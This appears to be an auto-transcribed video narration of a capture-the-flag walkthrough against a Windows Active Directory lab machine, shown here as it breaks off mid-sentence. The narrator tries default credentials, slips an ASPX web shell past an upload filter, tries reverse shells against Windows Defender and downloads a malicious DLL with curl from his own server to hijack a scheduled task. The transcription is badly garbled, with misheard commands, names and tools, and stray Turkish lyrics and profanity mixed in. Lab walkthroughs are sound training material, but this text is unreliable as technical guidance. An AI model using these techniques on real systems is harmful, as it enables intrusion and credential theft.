What's going on YouTube? This is me, and today we are going to be jumping our second video of Active Directory. So, we are spinning the wheel and checking our new targets on the Hacktoberbox. The Hacktoberbox has more than 30 the Active Directory boxes. So we will be doing them to be buy of the one of them. So, and then it says we have to be doing today is hot. So I'm just wonder where's the hot. So let me checking my second page. So it's a hot, I think it's not hot. So it says this is to be insane difficulty. But let me check it for this. So let's just gather here 3 hours to be gathered here to be escalation. So we can do it what we actually is reminded us. So we're trying to be do it to by ourselves. So is it gonna be learning new things from Active Directory? So for sure we're gonna be learning here new Chichi or like trying to be gather here the first gathering information about these boxes. So the first of all, let me checking why the ping attack is here. So if I can gather here the access from the data, so we can actually starting it. I'm just thinking about it. Is there something wrong? We cannot actually be gather here and access from this data. So what we actually be used before the for to be an SMB enumeration attack. So you can just checking for SMB enumeration. XDF for example you can go. So and then you will see here on the cheat sheet from XDF definitely is the best. So I really love with the OXDF the block. So you can use it for this, for example, if you want to be used. So I don't know, is it gonna be your maybe doesn't matter. So let me reset the machine and jumping over new targets. Which difficulty is insane actually. So it's maybe I take an hour to be recording this video. I'm actually trying to be gather here my best time to be do it. Maybe we can check it some hints or something like that. So we already know is here is machine info. So Hatter is an insane Windows Active Directory machine that starts with a web page that is currently under construction. The CMS used for the web page is the Moyo Portal CMS. Since the CMS open source, an attacker is able to find a default credential with admin panel straight away. So that is great. So we are starting here with the web server. This is the first thing I think I like it here. So the actually is using here or CMS or something like that. Get access admin panel doesn't discovered any files with extension txt and can be uploaded to remote servers, so an attacker cannot leverage in this upload web shell and txt extension. Then the copy option allows the attacker to switch back and extend ACPX. So we're gonna be learning here ACPX for the begat reverse shell maybe or something like that. And the user is actually to be give it here the real life scenario, so that's cool. So let me IP copy it again and let me check. Can I get it here and access from these boxes? I don't know. Maybe I have to be change my the VPN or something like that. I'm not sure right now. But we're gonna be jumping for this as there is no access for now. So let me checking for this IP addresses if there is any working is, but there is no. Yes. So let me actually do it with connect HTTP. Am I connected here? Let me actually close this one and then download the VPN. Great. So I have to say and copy it here to forward it. But let me checking for VPN. Okay. So I think we need to be change it here with pseudo tags. So let me came here. Great, I think it's accessed here successfully. So maybe after one more reset, too many reset machine attempts. Okay, we can add to it. So can we say ping right now? Yes, we can get access from the data is over here. So I just want to tell you, if you're working on, so we can stop at it. If we're working on the web page, I think we can start here Burp Suite. Actually wonder how it's going on the web server. So as a for sure, let's start here and map scan for to get here to some port protocol, and maybe it's QS something like that. So let me try to be good first of all, and it says our service is unavailable. So I'm just wondering here, if I'm gonna be starting here a map scan, what will we get actually here? So is it maybe something different or something like that? I don't know. So let's do this. So the first of all, I think we can try to be get here crack map exec. As you did, you know, we did before here crack map exec, and if we're working here with SMB, so we can check in here their domain name or something like that. That some information is over here. So in a crack map exec on the SMB, we cannot get at any domain name is over here. I'm actually was trying here this one. The net exec SMB, so it has to be giving our it's working any is domain here, the like manager.htp. So maybe it's domain name giving us on the mmap scan. So for now, I don't know what we can do. I'm actually just wonder here, can we just go SMB client -l, and if I'm gonna just give here IP addresses. And then we saw here to Guest login is not successful is over here. So that's great. So we can go here in the documents and Active Directory was here, I think. Make their hathor. So let me try to be go hathor is over there. So I think would be cool for us. So maybe we are just waiting for, I'm not sure, is there something like that for to be gathered here. So if it's to be selected here insane difficulty, so I'm just wonder as it maybe here it's because to be bypassing something like to be defender as a Windows defender could be here. So that's actually the first thing I got in my mind. So but I'm not sure, so we will see all of the things here together here. So after that we can trying to be get here something different maybe. So I'm not sure. So we're just fun and how we can do it. So we will see actually. Okay, so great. So we got here 80 port is open and they're working on Microsoft HTTP. So I think we got here or new, okay, it's the domain name is winecarp.htp, and we can edit it nano and etc, and host is over here. So we just have to come over there and just give it this with as a for sure we need to be added here now without hathor. So let me add this like that. So after that all we can now right now is giving our the IP addresses here directly. So let me try to be give it, and I think it's one of them we can go HTTP winecarp.htp. So needed to be like, oh, there's no like that. So HTTP and winecarp.htp as like here. Is there something wrong? Alright, great. So we get it here. There's a home. So it's a dashboard. Is which one is more portal? So we actually saw it before. Was here the header and the winecarp.htp. So I think it could be important, but I'm not sure. Just let's try. So which one is different things? Header winecarp.htp. So this actually redirect us to somewhere, but we don't know. So we can check it here. So the first is header and the second one is winecarp. So the winecarp is working it's powered by ACP.NET, and header winecarp is ACP.NET. So those are look like same. I cannot actually see here any difference, but I'm not sure right now. So maybe we can get here to something about to be target. So what we get actually here to some JavaScript file and the search engine for HX or something like that. So let me check in my first of all here the winecarp.htp is redirect here, and the home and new page is the sitemap. We are sorry, we'll not go looking for a sitemap. Okay, let me checking for new page. Oh, there's our login page. I got it. So if I'm gonna be checking here, Windows is working on my portal, right? So can we register here? Let's try to register. Maybe we can do something different. So I'm just gonna be giving here as well that and security question here. I think it's important more. So let me create an account first. Password. Okay. We need to be giving here on the length is 7. So your account has been created right now. We are on the here the new page. So we got here the task and the member list. That's cool. And we found here is first of all it's admin and Osmat. So we can check it here, view profile for admin here. So we got just here and go what's her or something like that. And there's nothing we can go for. So for example, cannot see here a gender or something like that. So and we are sure that here which one is cool. Then I think we can go here. So we just say is over here is Moyo portal, right? So but by the way, before them all, I think we can start here charity to be safe with them. So let me checking my added here me one which one is header. So this is our new target, and then this is our mmap scan. So which one is actually we got here on the domain name? So I think is the 53. It's too important. So completely blue. I'm really sure about it. So there's some different directory we got it. For example, we can looking for robots.txt, and robots.txt is giving us this here. So is it could be important. So if we check it here, we got here the DNS name, which one is in header, the winecarp.htp, and that will be important for us. So let's just give it here the new color. So who cares? So there's something different port is over there, so maybe we can use it. But let's check out the first is to be web page. So then I think here we can say goes over there and search exploit. So at search exploit is generally working with Metasploit. I generally doing is to first of all do this not dash first of all I think we can say more portal, and we got here multiple vulnerabilities with TXT and forums and title presents cross-site scripting. So I think which one is important things here. So It's look like what we can do is Moyo portal. So let me actually say Moyo portal exploit. So then you can see here multiple vulnerabilities and cross-site scripting, and there is two things actually we found here. And in Git book we found upload malicious file in Moyo portal. So maybe we can do it. I don't know. So as it could be here injectable here directly reversal Moyo portal. For example, you can go as like that. So which one is we have to be do it? I'm not sure, but let's try something. If you're checking your design tools, CSS editor, framework, web config, then you will see here. So maybe. So can I check here Metasploit? The header. Let me say Metasploit here. Oh, that's for sure. I have to say MSF console, right? So then I'm not sure which one is I have to be doing right now. So I'm just gonna be say here search Moyo portal. There's nothing we found on the MSF console, so it's because it's txt file. So let me actually be checking it, so exploit, and after if we can call here -m and give this one, so you will get here. So let me cut it. What we actually be getting here, so I'm just wonder. So is the same with this one, and it's look like same. That's great. So we found it here is actually so. We can learn it here on the persistence XSS. So I'm actually want to be doing something different, but I respect it to be difficulty, and which one is give it here the insane. So malicious link from HTML. It's something like that. So the persistent XSS vulnerability we can send it here with the ACPX. So can we say, for example, Moyo portal default credential maybe is admin.admin.com and the admin for password. So let's try this. Maybe this was I think we can say is logout here on the home new page, the sitemap. I was showing here login. So the login page working on security login at CPX, we can give it here email to admin and the password for admin. Then great. Okay, we are successfully gathered here. So I think we can go here administration and the site settings, security advisor and role administration or something like that. The system log, for example. There's nothing we found. The file manager could be important. Because if we can upload a file here, we can gather something different. But as you know, here we got some logos and the PNG file and XML file here. For example, in CS XML, we actually found it here nothing. Some Excel file is over here. So I think these are two. Which one actually we got it here before. So that is really cool. So what we can do here, it's actually to be for uploaded here. So let me checking for this one now. As a new folder, the cancel is just is uploaded files. So we can upload the files here. So let's uploaded files to be uploaded on XSL. So maybe I just want to be don't want to do it. So can we do it here to be another part, for example? So let me actually want to be do one more time. And if I'm gonna say here a new page, it's gonna be uploading a new page for us. So I think it's not cool. The page manager for doing his manager for page. So let's say upload a file here. I think we can upload files here. For example, if you're checking for ACPX, so can be called ACPX for reverse shell GitHub. For sure we need to be go. I was visiting here in too much time, and shell and ACPX. I'm checking, is it correct? I'm not sure am I using this one before, so let me checking this one. So is it something it's creating with great to be for example do it. So let me actually creating with MSF console. Which one we're looking for? ACPX, MSF1, Windows Shell, the reverse TCP, and a host and a port. We just have to be give it here. So maybe we can say CMD ACPX. Yes, I generally like it too much because it's directly is giving us here CMD, so we can run it here any command what we have to be do. That is really cool. So let me actually checking my locate cmd.acpx. Yes, I actually did it before and on the flight. So let me cp and come here cat cmd acpx, and those are look like the same as you know. So let me actually uploading this file here. Upload the files and select files here. Let me go documents, active directory, hathor, and cmd acpx. Upload. This file type is not allowed, so we cannot upload in here acpx extension actually. So what we can do, so let's checking this from the website. So I'm just wonder what is going on. So upload the files and upload this file, and it says here post file services is like that. So I'm just wondering if I'm gonna be send it on repeater and send it, and it says or this type files is not allowed. So let me actually forwarded it. I need to tap this on. So can we change it here cmd with txt or something like that? Maybe we can do something different. So let me actually delete here for example the txt, and after that all its success is true is telling me its success is true. So that is really cool. So what about after if I'm gonna be cancel it and refresh this page and file manager, it's cmd.txt we got here. So and it's actually showing us here the cmd.txt file. So then I think we can give it here the rename copy. Okay, so can we use it here rename with acpx and the rename here? This type is not allowed we found it here, so we cannot change it with cmd.txt. So which one is different? So we cannot do it. Okay, so if you cannot rename it on the boxes, so let me see me the rename. So is it actually this called here is over here. So let me send it on repeater. So I'm actually wonder what we can do here. If we can upload it here acpx, what we can do for the comment. So we can upload a file here. So I think this is the way of to be acpx to be get comment here. Okay, we are doing here rename, and the rename is to be have to be cmd.txt and the cmd.acpx. We cannot actually do here anything like I don't know what we can do. The cookie station ID and acpx, the open my change name, http portal labs, the file services. So is there something um okay, let me cancel it and then say new folder. So I can actually call my folder name to be cmd. Great. So can we upload it to cmd and cnd? No files here, so upload the files. Select files, cmd acpx. Then upload it. This file is not allowed. So let's do this. Upload the files and with intercept zone. So maybe we are needed to be here new file. Great. So let's change it the cmd acpx with cmd.txt and forwarded it. And then as action is list and the pattern let, I think it's successfully changed it. So let me checking for yes. So if I'm gonna be rename right now with acpx, so maybe is it this file is not allowed right now. I think we got it here as the same thing. So what we can do actually, let's set it intercept is here one more time and looking for what's going on here. Maybe we're trying to be something like that or some, as you know. So if we cannot rename here, so maybe we can check it for to anything different here, like maybe rename is just a rename here on the move. Can we move here and copy? Okay, we can copy this file. After the copy, invalid file name or already exists, specify another name. So let me intercept this one here, and then I'm gonna say here cmd acpx and copy, and is it actually send it out here. So is it for the copy cmd txt and cmd acpx. So what we can do, if I'm gonna be forward and an action is list. So let me check it. Is there something changing? Not sure. Maybe we are doing here something wrong again. So is it important things to hear? It's which one is action and which one is here is to be path, and the new item path is cmd acpx. Is it gonna be forget here? So this file type is not allowed, or we got actually. So this doesn't look like it's not working, but just wonder. So am I doing maybe here something wrong? So I think we can change or something differently here for or to be trying to be copy here. Let's actually, so maybe we can change it here. Do it copy name and acpx. If I'm gonna say copy, is there something wrong? I don't think so. So we can check it here. Someone for sending. So for example, if I was be send it here the txt file, where it's going to be selected it. So that's the first thing I think we need to be know. For example, let me check it here. HTML fragments. So what about this one? This sums detective sync fragment, for example. So should we say it here copy with test.acpx the copy? Nothing here. Maybe. So what is going on my, so for example, where is the fragment is for example here. So is it on, let me checking my target, and then could be here. Great. And data sites, so it could be on data sites, right? So in the data sites, and let's say here on the one and the media, right? So other could be here media, for example, HTML, and fragments would actually be showing here, and fragment 1.htm, fragment 1.htm, data size, raw media, and HTML fragments. So is it could be like that maybe? The sums text is bolded HF fragments, so it's needed to be, or CMD ACPX could be looking like that, I think. So this is actually what I'm thinking about it. So I don't know, but that's my decision is here. So I think we need it here to be ACPX to get comment. Let's check it. So let's give it this here. No. This is could be our target. After that, we got it here. So, but right now is need to be go back the file manager, I think. So right now, if you're checking here, data sites 1 and media, and I'm checking here cmd.acpx. Is it gonna be giving us is nothing font? I think so. All right, it's successfully be uploaded here. Damn, that means our copy is working, right? All right, great guys. So that means our copy is working here, but it's not giving us this nothing, as you know here. So as a program is, it's actually showing us how as ACPX is work. So it's important when we get to here CMD ACPX. It's running here. It's running with the program, and this which program is running here cmd.exe, and we can give it here arguments. So for example, C Windows System 32 and the C net user maybe will not work, but let me checking for who am I and run it. Then yes, okay, it worked. So we have successfully gathered here. So and then we can say here dear and C maybe. Let me check it, and then we found it here to be listing successfully here. So what about if I'm gonna be listing here the users, and I'll be found here Jina Wild BPRs and administrator or something like that. But I think is here is the best thing to be getting here reverse shell. So you know what? Let's try to be getting here reverse shell successfully. Maybe we were successfully here to be getting here basic reverse shell, but I imagine if it's selected here to be user is Windows is insane, it will not easy. I think there's a Windows Defender, so you can just try here after restarting Anka listener. Let me actually go here reverse shell generator. So I want to be show you what I'm actually always using here for reverse shell, so you can check it with you. Let me checking my IP addresses here 14 and 13, and where is it? I generally use here PowerShell on the base64 always. It's generally working. So let me say PowerShell. Let me checking is it correct. Yes, is PowerShell-E, and then if it's not running, it has to be giving here the reverse shell, but it's not. It says there is at line 1 and char 1 as system socket TCP clean. The scripts contain malicious content. So I told you before, and there is an the Windows Defender. So it's look like that will be not easy to be get here the reverse shell directly. So we need to be know here something different. So if it's working here Windows Defender, we can do something different. So what we can do, so we sure it's gonna be working. So I don't want to be click this port, but we actually ending here my portal. So let me actually first of all checking here Windows Defender XDF. If it's given something, for example, on the share log and then on the acute or something like that. So Windows Defender logs here. So does it look like it's after the get shell here? We don't get shell here to be. So as acute is Windows Waxus. So we will do it. So just want to be looking for it's if XDF can do it something here, so we can do it by myself, and I think it's gonna be working like that. Let's say we can do something like Windows Defender. No, you was gather here reverse shell directly. So what we can do, I think we have to be do something like using different things maybe on the shell, or how we can bypass here script and so Windows Defender XDF. So can we say insomnia? I was actually looking about it. Insomnia. Firewall bypass. So is it something I actually remember like these things? I have problem too. All my project was no. Maybe we can learn something new here. Or can we say here, so we already got here, maybe we can say dir C, we can learn something different here. So get bad password, for example, and it pop Microsoft scripts. So there is storage reports. So I think there's three things we found: is share storage reports and get bad password here. So what about this one? So can we check it this? Dir, and then let's give this, and the credential. Oh, there is something different we found, I think. I don't know. There's something PowerShell fine. It's PowerShell me one. Let me checking accessible here. For example, run it, and then info.txt. Is it not needed to be bypassing? Maybe. I don't know. So account groups CCVX. So password list. So can we go here? Password list. It's just password list. Okay. So let me go. Is run. CCVS. What is this? And if I'm gonna run it here, we found some exported wine corp CCV here. Can we type it here? Does it allow it? Type active the password account, delete password. Which one is password here? This one maybe? So let me try to go correct station. Is it maybe crackable? I love good 17 we found. So this is not password, but which user? I'm just wonder. Can we check it here? First of all, so I think we have password and we can try on to be. Okay, see users. No, not type. I wanna be here, dear. B3 mail, bpassrunner, and Gina wield or something like that. So let me actually do here nano users. B3 mail, bpassrama. Sorry, and Gina wield. Oh, there's another user here, Abimir or something like that. Okay, crack map. We can say it's a user, and we have to be change it with this password. Okay, great. Supported HTTP. I think we can say winecarp.htp. Nothing here. Maybe we have to do it with password. So IP addresses. Let's do this. So there's not look like there is no. So this is no like password here for any user. So this is not intended to wait, I think. So we can do actually here Insomnia shell. Insomnia shell ACPX. I was actually something like that for reverse shell here. Maybe this is giving us reverse shell here, because I think the other Y is not, so as it's doing same thing, so let me download this file and then call it here cp homily downloads insomnia shell. So we have to be downloaded, right? So let me actually do upload the files, but the first thing I think we have to be do intercept zone, right? Select files, insomnia shell.acpx and upload. So let's change it with osman.txt and forwarded it forward and intercept is off. So it's over here and copy. I think we can say s1.acpx. So if I'm gonna be calling here s1.acpx, then yes, okay, we will successfully be uploading here Insomnia shell.acpx. So right now, can we send it here over shell? The host will be wanna be giving my IP addresses for my port. I wanna be give 444, right? So connect back shell. Then yes, successfully we got it here shell, and that was really cool. I really like it. So that is cool. So we got it here shell, and we found on the system 2 ms too many DLL file. So it could be maybe important. But first of all, let me go here to the C page. See, can we go here on something different things here? So for example, as you remember, we will show here on this bad gets BAD password or something like that. So then we found here something different, as you know, like the password. So I'm just wondering, can we use this password right now? I mean, so who cares? Let me check it here. cd get bad passwords there, and then I think we will go accessible here. Accessible there, and then let's say cd csvs here, type pool, and so there's look like no more this hash. So the one hash we found here is this one, is correct station, is what we get actually found here. So can we say here maybe is a for let me checking my exit here, and then say ls can't use us. So is there a look like it's different here, I think. So can we say and for this use us. So let's try here smb client dash l. Okay, so I just want to be give here on the for, as so I want to be show you the another things in the Hathor. You can use like that Hathor because it's DNS name, and one corrupt.htp, and you can say here share and issue. For example, we can give here or new username is which one is bitwise and meal as like that. So let's add it here one corp.htp and dash n and dash key. So you can check it with this, but it says us here it's not undefined here, so it's look like not working here. So it's actually if you remember here with crackmap exec, it was giving us here nothing, so its status is not supported, so it's not login is unsuccessful, which one is cool. Completely believe that. Let's say here Kerberit, for example, we can do. Who cares to be getting here something different. Let's change it here. Can we say Kinet, and so let's do this etc Kerberit 5cc and something like that, change xdf. So let me checking here segment. Yes, I was thinking like that. Okay, etc. Yes, it's we have to be change it, or the file does shows information of the domain here. Completely believe that. So we have to be change it is like that. But it's not needed to be changed at them all. So I'm just wonder how is it changing for these boxes to OXDF. Um, Let me upload it. Who cares? Um, Wanna be? Oh, we are getting here too many things. Oh, that's right. That's cool. So yes, it has to be uploading in etc Kirby for configuration. I remember. So let me check it here. Pseudonym tags as like here. So we need to be give them I think we can add it here, and the Kainet, and the width is new username. Let's say Kainet and with email. So is there something wrong? Should I add it here? As like here, and the realms. Let's do this. Yes, I think we can change it right now. We can change it. What was our password? Our password was here. So I think we can copy this and just give it here, right? So on the right now we have to be run keyless, and then we found here curve vulgarity here on Winecarp HTTP and Winecarp HTTP2. Its default principles is bitwizmail winecarp.html. So then I think we can now run here smb clean header with this. So right now we can give in here the password. Then it's not needed to be given here password because we allocated before. Then yes, okay, we are getting here smb shares from bitwizmail. That's really cool. Exactly. So we need to be doing something. For example, let me go cd scripts, and we found here too many file as like here, but maybe is it maybe 4. So let me go back here, then say ls, and change it all. Yes, I want to be getting all files here, so who cares. After that we can go scripts and then say here ls2, and let me check in what 7zip64 dll, get 7zip64 dll here. So which one is, I think is important, so then we can get here. I want to be wonder what is actually due here. We found auto it's 64exe, so let me checking for if its file is not assembly. Sorry, file. If it's working on the night assembly, it's not working on night assembly actually. File, what about? It's not net assembly. So it's look like we cannot doing here nothing like. Is it something maybe we need here, you know, who cares? Maybe we are needy here some skills like reversing. So let's do this. Is it needed here? Maybe we found something. AO3 maybe we can do. Let's go scripts here, and let's try to get this too also. Okay, it's actually showing us as how is it working, so that's cool. Then I think we needed to be here yet. How it's actually work? I don't know. What we can do here? Just wonder. Let me close this OXDF. As an index here, the current variables is global SEZIP DLL is 7zip DLL here. If we intent modify original name of user DLL, don't modify 7zip startup function files. It's a section. So you know what? I think we need here some changing with this DLL file or this exist file here. Right, so I think it's so just showing us how is it working. So I don't know what we can do is it to be uploaded here. So let's starting assembly here. Okay, so we can do this. And after that all, maybe we can find something different here. I just want to be added here cd documents and active directory header. It's because maybe we need to here change something like, I don't know, or something like that. So maybe we can find different things from the shell, but I don't think so right now. I'm just wondering, can we use here bitwise mail with corp for evil windows.rm? Not sure. So let's actually do what? So is it like DLL hijacking? As a form interpreter. Okay, it's look like your own. I think we can use these for DLL hijacking here, like this one or this one. Okay, note that several DLL that you compile must export several functions that are going to be allowed by victim process. If this function doesn't access binary, you won't able to load them, exploit will fail. So does it look like what we have to be do here? I think. Um, let's say. So for example, can we use it directly? Maybe. So if I'm gonna call it here, not here. I think it's here. Who am I? And wine court with the wrap here we are. So it means I think we are not here with this smile too. And I think we need to be too. I imagine. So let's try this to be get here something different maybe. Let's say Sublime tags and task.dll and then C users username whoami.txt. Let's change it with C and here Windows and temp and here let's look like nothing here, so maybe we can add it here something different, like I don't know. Can we use it here evil Windows RM? I'm not sure it's gonna be working, but we're not now with that not working, right? I'm not sure. So let's check it. What is this? Oh, it's Max Carson. So you know what? Let's check it. How it's actually OXDF did it. So something DLL file with. I was actually stuck here. An access they needed, and okay, so does it look like we can need it here ncat.exe, locate ncat64.exe, cp opt ncat64.exe here. Great. Execution via DLL override, put ncat64 over exe, ncat DLL. So let's try this. What it says here is save us the ncat.dll. So after that, get here cd scripts. Let's say there. Does it look like okay here? Great. So we'll actually use its enumeration via DLL. Great. And for the shell, where did you upload it, this DLL file? This is important things, I think. No. But it's remind me something that I can use. Let's say not here as a here. Okay, let's say it's CD. No, CD. That's for sure. Here, and let's try to go share. It's access needed. We got. Can we get it here shell as? Okay, let me say continue. Can we get the shell as be our new user? No, we cannot. So let's look like I think we need to be worked with how we can get its user here. Should we use it, for example, like okay, I think we need user to be get here the shell. Great. I just wonder. Okay, it's remind me something, but nothing I can do here. So we can go share. So we need to be reverse shell, I think, with rice mail here, right? So I think like some Python file have to be used. Reverse shell with shell on Windows Python. So I don't remember what we can use here. Run SCX. That's for sure. Locate run SCX or now what was it? Oh my goodness, man, can't remember right now. So what was it? I really don't remember. So but I need here we need reverse shell. So it will Windows around now work, right? Let's say okay, let's do this. Okay, it's not back, right? Let's say okay, can we run it here? Run as CS.exe, locate run as cs.exe. There's like nothing I can do here, bro. Okay. Oh, H2 hack the box flight. Yes. Alright, great. Locate run as cs.exe. Let's cp and here Windows temp there, and let's say curl. I think we can start here Python listener sen de mi en dibe daldın, en son ben de uyandım artık of düşlerimden. Sen de mi en dibe daldın, en son ben de uyandım artık of düşlerimden. Can we upload it here successfully? So how we can run it? Run as cs.exe, and we need to be giving here the username first. So let's give this. Wait, oh shit, it's my fault. Wait, smile. And after that, we need to be giving here password, right? So as like here, I think we can give a password what we got here before on here. So I'm sorry, we need to be give it like, let's say who am I. This program is blocked by group policy format if connect your okay, it's because we cannot running here Windows Defender, I think. So which one is cool? That's correct. So if we cannot working with this, so I think we can change it with doesn't matter, so who cares. Maybe we can change it here with this what actually XDF user here. So maybe doing could be here gathered shell with bitrise mail. It's not definite, so let's use it for we get here the for DLL file. Let's say this could be our DLL file, right? So let's say here I have to be running here I think SMB client, and then let's try to be go here and then say here sublime tags and shell.dll. So we need to be worked with this, I think. After that all, and I think we can just change it this one. then we can upload it. And inet pop www data sites one media, and it's look like we need to be uploaded here ANCAT64exe. And so let's go for, okay, we have to be uploaded here ANCAT64exe. Upload files and select files, and I go for home. It's over here. I think we need to be go opt and ANCAT64. It's not ANCAT-exe actually. Let's say one more time. Select files. ANCAT64exe. And first of all, we need to be intercepts on, and then let's upload it. It's look like not working, and we need to be changed to ancat.txt and forwarded it, and forwarded it one more time, and intercepts on. And we found here ANCAT64txt is over here. Then we need to be copy it with antec64.exe with copied here. That's cool. That's really cool. So I think we can try to be go here on the for check in here. Is there any ls, and then ls cInet pop. Oh yes, we have to be call here dir. The specified void is not invalid, so we need to be calling here dir c inet pop www data and sites one media and ANCAT64.exe. So there's an ANCAT64.exe. So it's look like or DLL file we're gonna be worked here. So which one's cool? Great. So then I think we have to be uploaded here or file as like 7zip64 DLL. So let me take it here dir, and I know I have to be go for the scripts here. Let's say dir, and then it's need to be changed with this, I think. So let's say put shell.dll as 7zip.dll, and then it's working on this over here, right? So then I think we have to be changed our ANCAT listener as like $$ here. So maybe it's gonna be giving us I think when tasks will be run it's changing me like to be reverse shell is over here, I think. So what we can do here, we're right now on the C share bginfo64.exe file and the Gina build, and at inet pop we have ANCAT64exe, and it's working like here bginfo64exe cmedia exe share bg as like the cmedia as like on my machine here. So let's check. It's look like nothing. So let's do it one more time. The put it here as here successfully, and it's need to be get here my shell here. Then I imagine. So maybe there's no idea why it's not working. Maybe we can do it something wrong. Let's say can we change it with maybe it's something different things to here. Can we change it so here changing something like do it one more time, maybe and ANCAT64exe is still here. I'm not sure why it's not working. So maybe we are doing something wrong here. Let's say check it one more time. Now there was look like nothing for us. So it's look like maybe we are doing something wrong, right? Is iCalcs that we use here. So for example, is it is working or not? So we can use it maybe here. So what that OXDF says us, after going at the name, it will open DLL main CPP and then showing. Then I will include the get access system function and update the DLL process attach. That's right. So what about this one? Enumerator via DLL. I am leaving the ping and so that I have some indication when it runs. I will upload it and after a minute so I get pings, I check with the shell and there is a file. It's gonna be creating here. So it's gonna be working on. Oh, it's because right here that's right. We need to be changed with this light. Okay, that's correct. Case DLL process attach here. Let's say this with 12. I hope the NCAT64X is here. And right now, let me say one more time to DR here. Okay, NCAT64X is still here. Let's say cd documents and then active directory hatar ls and cat shell.dll. It's look like okay. And I think we can say put shell DLL one more time. So it's has to hit it here, right? Why is that? I'm not sure. Does it look like network here? Not sure. Okay, let's check this one. Great. By following this, we can copy code from impersonational from Visual CNET. Where we should give this. So is it another things we have to be do? So let me actually show you raw. Control A and Control copy. let's say nano shell.acpx shell2. I can one more time. We have to be upload the file, select files here, documents, header shell2 acpx. So let me say intercept is on and upload the files, and let's say this txt forward and intercept is on. New page, shell.txt here and copy with acpx shell2 to acpx. It's gonna be changing something here. I'm not sure why. Why it's changing? I don't know here. So let me say delete output files. Forward, accept on. So let me refresh it. It's hard, bro. It was hard, you know. Now there is no shell2. So is it like directly shell to acpx? Domain oh yeah, oh that's right, cool. As over here, bit was my one card and this password, and I think we have to be changed on to 13, right? So then I think we can right now call ancat mvlp 2222. Let's say one more time to be change it. It hits the back here of a shell, right? If I'm gonna be giving here the correct one. No. Why? Oh, that's right. um, oh my brain is fucking right now. So we have to be deleted it. Delete and we need to be uploaded new files. Upload the files, select files, shell to ACPX, and intercept its own, and then upload it. Need to be changed with txt, intercept. Anyway, so the shell.txt is over here. So can we change it with ACPX? And our listener is still here. And let me say controller hash and the shell ACPX2. Let me try to go. Then yes, we got shell here with Bitris email. Oh my god, that's cool. That was really cool. So I think there's nothing we got here. So there's no any user.txt we found here maybe. So let's check cd go for this dear use us dear and Bitris meal dear desktop. Now there is no user.txt actually. So then I think we need to be privilege escalation to hear someone. So and it's calling to me what we can do. That's the first thing we need to be 7zip.dll, right? Completely believe that. So I'm just wondering what we can do here. So we are right now is it with mail, right? That's I think that's correct. So we can go right now. Let me say go share dear, and there's we found here. So let me go for scripts and go for say dear, and if I'm gonna say is I calls 7zip64 DLL. So as a icons of working here successfully processed one file. So this therefore present an opportunity to perform DLL hijacking attack. The email I think is I use the custom process. So let's say that is there something wrong? So we can close these tabs because it's over. So we need to be using here some DLL hijacking. Which one's cool? Let's try to do this maybe hijacking DLL here. Let's say can we use a phone here? Something DLL to do it. The payloads DLL. So what I actually found before is over here. Then I think we can try to use them. So this is the system right here, right? So let's actually try to use this. All right, so let me copy it and go for let's say this. Okay, I think we can exit here nano windows dll.c. Now Sublime tags windows dll.c, and let's give this. So then I think we can call it here with echo if it's like working here. So let's say a system echo Osman to see needed to be added here to one more time, right? Windows and temp, like say, and I think we can call it here username txt, like here. This is actually for x64 compile it gcc windows dash output.dll. Okay, so let's do this. Well, didn't need it here compiling. Like here I have to be used. Ne diyorsun amına koduğum? Sikeceğim olacak ya. Tamam onu sildik ya amına koduğum. Okay. So output DLL is over here, I think. Then we can send it. So let's say come over here for curl, right? And then ls or something like that. So we need to be changing here or DLL file. So let's say python 3-mhtp server, and then I think we have to be saying http timeout and timeout 14 and 13 on this port. I want to be actually send it here output DLL and -o for how it's actually intending here. So let's save here on Windows tasks and task.dll. Let's say there but for sure is nothing here. So but I think we can call test.dll here. Then we found here test.dll is over here. So I think we can copy it to see Windows task test.dll, like see and share as like what we're running right now. Then call it here the scripts for another directory, and let's say here 7zip64dll as like here, and I give it here ds for then copy it here. So then I think we can call it here del. Let's remove this test.dll. Then I think what we can develop to be used here. So I have to work with this. I think let's say it has to be working here on the CD Windows temp. So let me go for Windows temp here. Let's say here dear is it needed to be creating here the username.txt, but it's not like they're here, look like here. So I'm just, oh, GinoWeld.txt, we got, let's say the type it, and that's called here is Osman. So as the GinoWeld.txt is giving here to here Osman, as you know here. So I think that's really cool. Then I think we can create a file here for the shell, I think. And let's say I'm just wondering, can we get here through the shell here directly? I don't know how is it working, right? But I think we can do it for us to be getting here the shell, right? Let's check it for understanding it. How was UC? So if I was working with shell.dll here, sublime tag shell.dll, so I think this is move shell.dll to shell.c and key. Now let's use it as like like x need to be changed. It's shell.c osman.dll, right? pgh. This is for it's not working with the CPP. It's because it's working on C++. We are also is working on C++ here. Anyway, so we will have get here is another things to successfully be doing here, right? So we will get here. So then I think where was it, or what we do and change output TLL, this Windows DLL.c, right? So if I'm gonna be changing here Windows DLL.c, and I think we can change it with to get shell here, to get here a new shell, or would be reverse shell. It's not look like working for us. So then we can ignore it, you know, and just for and get here to another port. For example, echo let's say copy C and like here to users. What was the users here? GinoWeld, right? So let's say dear C and users here. It was GinoWeld. So can we get here GinoWeld desktop user.txt? Then I think as a user.txt or flag.txt, I imagine. I really want that. I think it's was the txt here, and then copy this here. See Windows temp like is one.txt. I think we can say, and let's say x64 with Windows DLL.c with shade out -o output to.dll here. So after that we found our output to DLL as like here. So then I think we have to be do what we do before, as like before here. Let's say again we have to be called here curl, curl, and let's say HTTP, and 10 dot 10 dot and then 13, output to DLL, output to DLL dash O, C Windows and tasks and task.dll here. So after that all, can we say for sure we need to be do check if there is test.dll. Then yes, there is test.dll. So we need to be copy this. Let's copy this C Windows test.dll and see and share, and we can say scripts, and we need to be save here at 7zip.dll here as like here, you know. Then it has to be given here, yes, for sure. The all files is buys another process. Wow. So there's nothing we can do again here. So let's say there. Let's go cd share dir scripts dir again. Okay, one file is copied here, so it's look like it's working. And then let's delete Windows tasks and test.dll here. So that zip.dll is look like here. So then I think we can try to go see Windows and temp, like here, C here and temp and here. Then it's need to be, we have to be get here what we call osmo.txt, the for copy C users January desktop user.txt and C Windows temp osmo.txt. It's look like maybe not working because of the for some permission. Anyway, so that's cool. Maybe we can try here something different, like say there. Then I think we can change something with this, because we can running any script here as like here. Copy C users January desktop user.txt and C Windows temp and then small.txt. So I wonder what this man do this here. Okay, same thing with us. Oh, it's directly got the shell here? Wow. Wow. That's really cool, man. Oh, we got here osman.txt. Type osman.txt. What? Type osman.txt. Oh, it's just say one file's copied? Shit. So, anyway, let's say here sublime tags less. I want to be shade here less.c. So we need to be worked with this. Then I think that could be my IP addresses here on the curl and the -bg on exe file. Alright, so we have to be starting your 